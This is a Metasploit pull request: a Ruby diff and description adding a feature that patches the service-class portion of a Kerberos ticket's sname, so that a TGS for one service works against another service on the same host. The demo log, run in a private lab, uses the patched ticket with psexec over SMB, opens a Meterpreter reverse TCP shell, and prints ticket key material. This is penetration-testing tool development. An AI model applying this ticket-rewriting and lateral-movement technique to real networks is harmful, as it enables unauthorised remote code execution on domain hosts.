### PR TITLE
Load TGS tickets with a different sname

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -142,13 +142,23 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     credential = nil
     if cache_file.present?
       # the cache file is only used for loading credentials, it is *not* written to
-      credential = load_credential_from_file(cache_file)
-      if credential.nil? && hostname.present?
+      credential = load_credential_from_file(cache_file, sname: nil, sname_hostname: @hostname)
+      serviceclass = build_spn.name_string.first
+      if credential && credential.server.components[0] != serviceclass
+        old_sname = credential.server.components.snapshot.join('/')
+        credential.server.components[0] = serviceclass
+        new_sname = credential.server.components.snapshot.join('/')
+        print_status("Patching sname from #{old_sname} to #{new_sname}")
+        ticket = Rex::Proto::Kerberos::Model::Ticket.decode(credential.ticket.value)
+        ticket.sname.name_string[0] = serviceclass
+        credential.ticket = ticket.encode
+      elsif credential.nil? && hostname.present?
         credential = load_credential_from_file(cache_file, sname: "krbtgt/#{hostname.split('.', 2).last}")
       end
       if credential.nil?
-        vprint_error("Failed to load a credential from ticket file: #{cache_file}")
+        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new("Failed to load a usable credential from ticket file: #{cache_file}")
       end
+      print_status("Loaded a credential from ticket file: #{cache_file}")
     end
     @credential = credential
   end
@@ -982,6 +992,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
     end
 
     sname = options.fetch(:sname) { build_spn&.to_s }
+    sname_hostname = options.fetch(:sname_hostname, nil)
     now = Time.now.utc
 
     cache.credentials.to_ary.each.with_index(1) do |credential, index|
@@ -1005,6 +1016,11 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
 
       unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
         wlog("Filtered credential #{file_path} ##{index} reason: SPN does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        next
+      end
+
+      unless !sname_hostname || sname_hostname.to_s.casecmp?(credential.server.components[1])
+        wlog("Filtered credential #{file_path} ##{index} reason: SPN hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
         next
       end
 


### PR DESCRIPTION
This adds the feature requested in #17571 by updating the logic that loads ccache files on disk to patch the serviceclass portion of the sname field, thereby allowing the ticket to be used. This is useful for using TGS tickets for other services *on the same host*. This works because the serviceclass portion of the SPN is not protected by the signature on the PAC.

Metasploit loads tickets from two sources, files explicitly specified (updated here in this PR) and from the database-backed cache. The database loading mechanism is left as is for now. If a ticket with a different name is needed, it seems unlikely that the cache would be missing the TGT necessary to issue it. I could be wrong on that though and maybe it should be updated in the future. For now though I think this will address the use case described in the ticket.

This also changes the loading mechanism to throw an exception if no credential can be loaded from the file. This is so the user isn't surprised if they specify a file and no ticket is loaded, since that's clearly what they wanted. 

## Verification

- [ ] Use the `get_ticket` module to obtain a TGS for the `HOST` service
- [ ] Use that ticket as the krb5ccname option for some other module
- [ ] See that the name is patched and the module still runs

## Demo

```
msf6 auxiliary(admin/kerberos/inspect_ticket) > run ticket_path=/home/smcintyre/ticket.ccache

[*] No decryption key provided proceeding without decryption.
[*] Credentials cache: File:/home/smcintyre/ticket.ccache
[*] Primary Principal: smcintyre@MSFLAB.LOCAL
Ccache version: 4

Creds: 1
  Credential[0]:
    Server: host/dc.msflab.local@MSFLAB.LOCAL
    Client: smcintyre@MSFLAB.LOCAL
    Ticket etype: 18 (AES256)
    Key: 35c7192284136a8b4ec13e4ea16ad964f146708222ca394f1127691dc9d498f9
    Subkey: false
    Ticket Length: 1093
    Ticket Flags: 0x40a50000 (FORWARDABLE, RENEWABLE, PRE_AUTHENT, OK_AS_DELEGATE, CANONICALIZE)
    Addresses: 0
    Authdatas: 0
    Times:
      Auth time: 2023-01-31 14:39:58 -0500
      Start time: 2023-01-31 14:39:58 -0500
      End time: 2023-02-01 00:39:58 -0500
      Renew Till: 2023-02-01 14:39:57 -0500
    Ticket:
      Ticket Version Number: 5
      Realm: MSFLAB.LOCAL
      Server Name: host/dc.msflab.local
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 4
        Cipher:
          YsKaUKnQPwIVhh5RhvJC98QrPip0j5PMPwk0z9DavbA1wOKnw/RXONEBZ6GJk85XEEczoUjnlyFPZK2uSKdQu9ESAEzp+K2I1x6ew80itx/cuuu4G8AIZK6VAfPZhWIkbbmglXiTbjv9ZoujUzpyRhOKHakL5MHBEXO3ditleh81zLL4b2q3AAL1XEmJQMPxXiUOQ/hkL++UzyOqJKWnpm8dTnxe3igHL+k+ucN732TUIyXFnAx9jpWBUd1KqfVXnBwwMVr2sbuYGh/tPUKDjzUn0jezyQO1BPaWSrvt52ZwO4YwgXknYnFP3DpjymOyn5dD6lJeZZT/NLHKSAf9N4Aj5cMdb8pY+ZGPzGYLzFSvf8yNM0PNtmIUb9KEoG/VAFT20sN8WBWTeuV0U/oeOvAN+zMlctxTmVBLZ2oQkYWvmf+0TPesr6iJqifSw8ek4mn67LhTBl5ZIRWY6j/wCw2EiJLa/9TrE6ImvC4cM7eO+F+ECmtUW/R0yFWoyHjdoKB/eZnL33wv908XOVxHLVjOTJk0QbkoZR7ujVN3U5R11z5qYPDxMxpWpXuAlPK4deq8CSAO1gQbxdhzI/d511UTB71UC+s4ZzhIzV5s8j8/ywQIV7SjlNf8iVDDNg5uuyIQkDoyEIwVFIeLyKlNID41EfksVcDxkDpFPb4DtFcx2tgQQTuz2C4BXcNNiI71OAZOApUmxbgrOVfnCdmVHDiM14T2rqJawY6JZu8g7HgYHfAmUGPvPqqzgv4jkGEyyGTfXUqKwuU/eNABxauW3s1wGlJ3xHPSiB4+ZgdB15n5izx00WTHnh9qYkC9EveAbm040kisYdoPwcSyL1udH0bqeinHSZ1wEG4HGajwD1XFCP5OnRLcu51nnOdd4WAgcMe0gPVKx3LgTVJ+J7kWXCAz///GtdRQf/SGxkf31N1+UXA6LxKtC57e8nel5nyaqXsPuJUOWAc+TKebwZ2xj10UlrFJIKPTDHWeTALOyVhhbBJCnBDl7Znui6LIbH0n7Zrf53It6jFXj4tKlx6XPXXf6Ni+ZjoUmDNhdN7l7h/7alc36qM+fKi0r+6RLYRfpeo3qHOLjwzuC7IgbDMlfK5ENgni5tshgh4zLA7JqSzx/YDSYsY59zCfP3HAyMuo5qaVaxoIIk1UQN2ZoMoTXCvUxNdquO1YZQFmRbZok80JneoyGrFJIp98balM+XZhl8WtPIjJQNnDNhxtpfzpJ9Je+PVZXijbRjDRRMD5ettQDrbuEh3eVDytiTZX/RuVIidMRx/26Zmv9Qsi77pDc/7YGukkoOjQgj5nT6qAm/nBYmuBPTOloos4
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/inspect_ticket) > use exploit/windows/smb/psexec 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run smb::krb5ccname=/home/smcintyre/ticket.ccache

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Patching sname from host/dc.msflab.local to cifs/dc.msflab.local
[*] 192.168.159.10:445 - Loaded a credential from ticket file: /home/smcintyre/ticket.ccache
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[*] Sending stage (200774 bytes) to 192.168.159.10
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:51507) at 2023-01-31 17:29:43 -0500

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(windows/smb/psexec) >
```
